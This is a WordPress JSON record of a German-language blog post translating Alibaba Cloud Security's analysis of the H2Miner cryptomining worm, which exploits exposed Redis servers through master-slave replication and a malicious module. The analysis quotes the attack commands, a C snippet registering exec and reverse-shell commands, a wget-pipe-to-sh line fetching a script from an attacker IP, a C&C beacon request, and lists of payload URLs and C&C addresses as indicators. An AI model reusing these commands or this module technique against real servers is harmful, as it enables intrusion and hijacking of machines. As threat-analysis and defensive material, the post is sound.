{"id":55714,"date":"2020-01-27T00:00:00","date_gmt":"2020-01-26T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce"},"modified":"2020-02-18T14:03:51","modified_gmt":"2020-02-18T11:03:51","slug":"obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","title":{"rendered":"Ein neuer H2Miner-Wurm-Ausbruch wurde entdeckt, der Redis RCE ausnutzt","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<blockquote><p>Vor einem Tag wurde einer der Server meines Projekts von einem \u00e4hnlichen Wurm angegriffen. Auf der Suche nach einer Antwort auf die Frage \u201eWas war das eigentlich?\u201c fand ich einen gro\u00dfartigen Artikel des Alibaba Cloud Security-Teams. Da ich diesen Artikel nicht auf Habr gefunden habe, beschloss ich, ihn speziell f\u00fcr euch zu \u00fcbersetzen &lt;3\n<\/p><\/blockquote>\n<h2>Einleitung<\/h2>\n<p>\nK\u00fcrzlich entdeckte das Sicherheitsteam von Alibaba Cloud einen pl\u00f6tzlichen Ausbruch von H2Miner. Diese Art von sch\u00e4dlichem Wurm nutzt unzureichende Authentifizierung oder schwache Passw\u00f6rter f\u00fcr Redis als Zugang zu Ihren Systemen, synchronisiert dann sein eigenes sch\u00e4dliches Modul mit einem Slave \u00fcber die Master-Slave-Synchronisierung und l\u00e4dt schlie\u00dflich dieses sch\u00e4dliche Modul auf die angegriffene Maschine hoch und f\u00fchrt die sch\u00e4dlichen Anweisungen aus.<\/p>\n<p>In der Vergangenheit wurden Angriffe auf Ihre Systeme haupts\u00e4chlich durch Methoden durchgef\u00fchrt, die zeitgesteuerte Aufgaben oder SSH-Schl\u00fcssel umfassten, die nach dem Login des Angreifers in Redis auf Ihrer Maschine gespeichert wurden. Gl\u00fccklicherweise kann diese Methode nicht h\u00e4ufig verwendet werden, da es Probleme mit der Berechtigungsverwaltung oder unterschiedliche Versionen des Systems gibt. Dennoch kann diese Methode zum Herunterladen des sch\u00e4dlichen Moduls direkt die Befehle des Angreifers ausf\u00fchren oder auf die Shell zugreifen, was gef\u00e4hrlich f\u00fcr Ihr System ist.<\/p>\n<p>Wegen der gro\u00dfen Anzahl <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/de\/server\/\"   title=\"Server\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"1464\">Server<\/a> von Redis, die im Internet gehostet werden (fast 1 Million), empfiehlt das Sicherheitsteam von Alibaba Cloud als freundliche Erinnerung den Benutzern, keinen Zugang zu Redis aus dem Netzwerk zu gew\u00e4hren und regelm\u00e4\u00dfig die Zuverl\u00e4ssigkeit ihrer Passw\u00f6rter zu \u00fcberpr\u00fcfen sowie darauf zu achten, ob sie anf\u00e4llig f\u00fcr schnelle Passwortauffindung sind.<\/p>\n<h2>H2Miner<\/h2>\n<p>\nH2Miner ist ein Mining-Botnet f\u00fcr Systeme auf Basis von Linux, das auf verschiedene Weise in Ihr System eindringen kann, einschlie\u00dflich fehlender Authentifizierung in Hadoop Yarn, Docker, und einer Verwundbarkeit zur Ausf\u00fchrung von Remote-Befehlen in Redis (RCE). Das Botnet funktioniert, indem es sch\u00e4dliche Skripten und Malware hochl\u00e4dt, um Ihre Daten zu minen, den Angriff horizontal auszudehnen und eine Command-and-Control (C&amp;C)-Verbindung aufrechtzuerhalten.<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<h2>Redis RCE<\/h2>\n<p>\nPawel Toporkov teilte sein Wissen zu diesem Thema auf den ZeroNights 2018 mit. Nach Version 4.0 unterst\u00fctzt Redis die Funktion zum Laden externer Module, die es den Nutzern erm\u00f6glicht, so-Dateien, die mit C in Redis kompiliert wurden, zu laden, um bestimmte Redis-Befehle auszuf\u00fchren. Diese Funktion ist zwar n\u00fctzlich, birgt jedoch eine Schwachstelle, bei der Dateien im Master-Slave-Modus \u00fcber den Fullresync-Modus mit dem Slave synchronisiert werden k\u00f6nnen. Diese kann von Angreifern verwendet werden, um b\u00f6sartige so-Dateien zu \u00fcbertragen. Nach Abschluss der \u00dcbertragung laden die Angreifer das Modul auf die angegriffene Redis-Instanz und f\u00fchren jeden Befehl aus.<\/p>\n<h2>Analyse des b\u00f6sartigen Wurms<\/h2>\n<p>\nK\u00fcrzlich hat das Sicherheitsteam von Alibaba Cloud festgestellt, dass die Gruppe b\u00f6sartiger Miner H2Miner pl\u00f6tzlich stark gewachsen ist. Laut Analyse sieht der gesamte Ablauf eines Angriffs folgenderma\u00dfen aus:<\/p>\n<p><img decoding=\"async\" alt=\"Ein neuer H2Miner-Wurm-Ausbruch wurde entdeckt, der Redis RCE ausnutzt\" src=\"\/wp-content\/uploads\/2020\/01\/e4e47a0ddb0bd9f8d97dd992f3349016.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nH2Miner nutzt RCE Redis f\u00fcr einen umfassenden Angriff. Zun\u00e4chst greifen die Angreifer ungesch\u00fctzte Redis-Server oder Server mit schwachen Passw\u00f6rtern an.<\/p>\n<p>Dann verwenden sie den Befehl <code>config set dbfilename red2.so<\/code> um den Dateinamen zu \u00e4ndern. Danach f\u00fchren die Angreifer den Befehl <code>slaveof<\/code> aus, um die IP-Adresse des Master-Slave-Replikationshosts festzulegen. <\/p>\n<p>Wenn die angegriffene Redis-Instanz eine Master-Slave-Verbindung zu dem b\u00f6sartigen Redis herstellt, das dem Angreifer geh\u00f6rt, sendet der Angreifer das infizierte Modul mit dem Befehl Fullresync zur Synchronisierung der Dateien. Die Datei red2.so wird dann auf die angegriffene Maschine hochgeladen. Anschlie\u00dfend verwenden die Angreifer das Lademodul .\/red2.so, um diese so-Datei zu laden. Das Modul kann die Befehle des Angreifers ausf\u00fchren oder eine R\u00fcckverbindung (Backdoor) einleiten, um Zugang zur angegriffenen Maschine zu erhalten.<\/p>\n<pre><code class=\"plaintext\">if (RedisModule_CreateCommand(ctx, \"system.exec\",\n        DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n      if (RedisModule_CreateCommand(ctx, \"system.rev\",\n        RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n<\/code><\/pre>\n<p>\nNach der Ausf\u00fchrung eines b\u00f6sartigen Befehls wie <code>\/ bin \/ sh -c wget -q -O-http:\/\/195.3.146.118\/unk.sh | sh&gt; \/ dev \/ null 2&gt; &amp; 1<\/code>, wird der Angreifer den Namen der Backup-Datei zur\u00fccksetzen und das Systemmodul entladen, um Spuren zu verwischen. Dennoch bleibt die Datei red2.so auf der angegriffenen Maschine. Den Nutzern wird empfohlen, auf das Vorhandensein einer solchen verd\u00e4chtigen Datei im Ordner ihrer Redis-Instanz zu achten.<\/p>\n<p>Zus\u00e4tzlich zur Zerst\u00f6rung bestimmter sch\u00e4dlicher Prozesse zur Ressourcenentwendung folgte der Angreifer einem sch\u00e4dlichen Szenario, indem er bin\u00e4re Schadsoftware herunterlud und ausf\u00fchrte, um <noindex><a rel=\"nofollow\" href=\"http:\/\/142.44.191.122\/kinsing\">142.44.191.122\/kinsing<\/a><\/noindex>. Dies bedeutet, dass der Prozessname oder der Verzeichnisname, der 'kinsing' auf dem Host enth\u00e4lt, darauf hinweisen k\u00f6nnte, dass dieser Rechner mit diesem Virus infiziert wurde.<\/p>\n<p>Laut den Ergebnissen der Reverse Engineering f\u00fchrt die Malware haupts\u00e4chlich folgende Funktionen aus:<\/p>\n<ul>\n<li>Herunterladen und Ausf\u00fchren von Dateien<\/li>\n<li>Mining<\/li>\n<li>Aufrechterhaltung der C&amp;C-Kommunikation und Ausf\u00fchrung der Befehle des Angreifers<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Ein neuer H2Miner-Wurm-Ausbruch wurde entdeckt, der Redis RCE ausnutzt\" src=\"\/wp-content\/uploads\/2020\/01\/43229670fd28e4b7f1974aa3c36dc3ca.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nVerwenden Sie masscan f\u00fcr externe Scans, um die Reichweite zu erweitern. Dar\u00fcber hinaus ist die IP-Adresse des C&amp;C-Servers fest in das Programm eingebettet, und der angegriffene Host kommuniziert \u00fcber HTTP-Anfragen mit dem C&amp;C-Kontaktserver, wobei die Zombie-Informationen (gehackter Server) im HTTP-Header identifiziert werden.<\/p>\n<p><img decoding=\"async\" alt=\"Ein neuer H2Miner-Wurm-Ausbruch wurde entdeckt, der Redis RCE ausnutzt\" src=\"\/wp-content\/uploads\/2020\/01\/111ba916fa76f45fe458622f260b1d8e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<pre><code class=\"plaintext\">GET \/h HTTP\/1.1\nHost: 91.215.169.111\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, wie Gecko) Chrome\/78.0.3904.108 Safari\/537.36\nArch: amd64\nCores: 2\nMem: 3944\nOs: linux\nOsname: debian\nOsversion: 10.0\nRoot: false\nS: k\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\nVersion: 26\nAccept-Encoding: gzip\n<\/code><\/pre>\n<p><\/p>\n<h2>Andere Angriffsmethoden<\/h2>\n<p>\n<img decoding=\"async\" alt=\"Ein neuer H2Miner-Wurm-Ausbruch wurde entdeckt, der Redis RCE ausnutzt\" src=\"\/wp-content\/uploads\/2020\/01\/51c088251ac8fd71d229bfe96e239c29.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h2>Adressen und Links, die der Wurm verwendet<\/h2>\n<p>\n\/kinsing<\/p>\n<pre><code class=\"plaintext\">\u2022 142.44.191.122\/t.sh\n\u2022 185.92.74.42\/h.sh\n\u2022 142.44.191.122\/spr.sh\n\u2022 142.44.191.122\/spre.sh\n\u2022 195.3.146.118\/unk.sh\n<\/code><\/pre>\n<p>\nc&amp;c<\/p>\n<pre><code class=\"plaintext\">\u2022 45.10.88.102\n\u2022 91.215.169.111\n\u2022 139.99.50.255\n\u2022 46.243.253.167\n\u2022 195.123.220.193\n<\/code><\/pre>\n<p><\/p>\n<h2>Tipp<\/h2>\n<p>\nZun\u00e4chst sollte Redis nicht f\u00fcr den Internetzugang ge\u00f6ffnet werden und mit einem sicheren Passwort gesch\u00fctzt sein. Au\u00dferdem ist es wichtig, dass die Clients das Fehlen der Datei red2.so im Redis-Verzeichnis und das Fehlen von 'kinsing' im Dateinamen \/ Prozess auf dem Host \u00fcberpr\u00fcfen.<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/485300\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u044d\u0442\u043e\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u043d\u0430 \u0445\u0430\u0431\u0440\u0435, \u0442\u043e \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0432\u0435\u0441\u0442\u0438 \u0435\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0430\u0441 &lt;3 \u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Alibaba Cloud \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0443\u044e \u0432\u0441\u043f\u044b\u0448\u043a\u0443 H2Miner. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-55714","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-01-26T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T11:03:51+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Ein neuer Ausbruch von H2Miner-W\u00fcrmern entdeckt, die Redis RCE ausnutzen | ProHoster","description":"Vor einem Tag wurde einer der Server meines Projekts von einem \u00e4hnlichen Wurm angegriffen. Auf der Suche nach einer Antwort auf die Frage \u201eWas war das eigentlich?\u201c fand ich einen hervorragenden Artikel des Alibaba Cloud Security-Teams.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster","og:description":"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.","og:url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2020-01-26T21:00:00+00:00","article:modified_time":"2020-02-18T11:03:51+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"55714","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 19:38:31","updated":"2026-02-09 16:50:17","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/55714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=55714"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/55714\/revisions"}],"predecessor-version":[{"id":158708,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/55714\/revisions\/158708"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=55714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=55714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=55714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}